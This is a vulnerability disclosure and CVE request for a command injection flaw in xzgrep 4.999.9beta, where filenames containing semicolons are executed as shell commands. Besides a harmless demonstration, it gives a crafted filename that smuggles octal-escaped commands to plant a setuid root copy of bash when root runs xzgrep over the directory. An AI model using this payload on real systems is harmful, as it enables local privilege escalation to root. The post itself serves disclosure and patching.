CVE request: xzgrep 4.999.9beta arbitrary code execution vulnerability

[Bart Dopheide <dopheide () fmf nl>]

I discovered a bug in xzgrep 4.999.9beta. Please assign a CVE for this 
vulnerability.

* Affected versions: 4.999.9beta
* Fixed versions: 5.0.0 and up, 5.2.0 and up
* Description:

xzgrep 4.999.9beta processes filenames containing a semicolon 
incorrectly, which allows for arbitrary code execution as the local user 
running xzgrep.

Demonstration of the vulnerability:
  sh-4.1$ touch /tmp/semi\;colon
  sh-4.1$ xzgrep anystring /tmp/semi\;colon 
  xz: /tmp/semi: No such file or directory
  /usr/bin/xzgrep: line 199: colon: command not found
  sh-4.1$ 
xzgrep tries extract/grep /tmp/semi and tries to execute "colon", which 
is obviously not wanted.

With a specially crafted filename and three ounces of social 
engineering, a local root exploit is possible. For example:
  sh-4.1$ touch '/var/tmp/;echo -e "cp -p \0057bin\0057bash \0057var\0057tmp\0057\nchmod u+s \0057var\0057tmp\0057bash" 
> zzz;sh zzz;rm -f zzz'
  sh-4.1# find /var/tmp -type f -exec xzgrep anystring {} \+
A suid root /var/tmp/bash should be the result.

I checked RHEL 6, CentOS 6: they run 4.999.9beta and they are vulnerable.

--
Bart Dopheide

Attachment: signature.asc
Description: Digital signature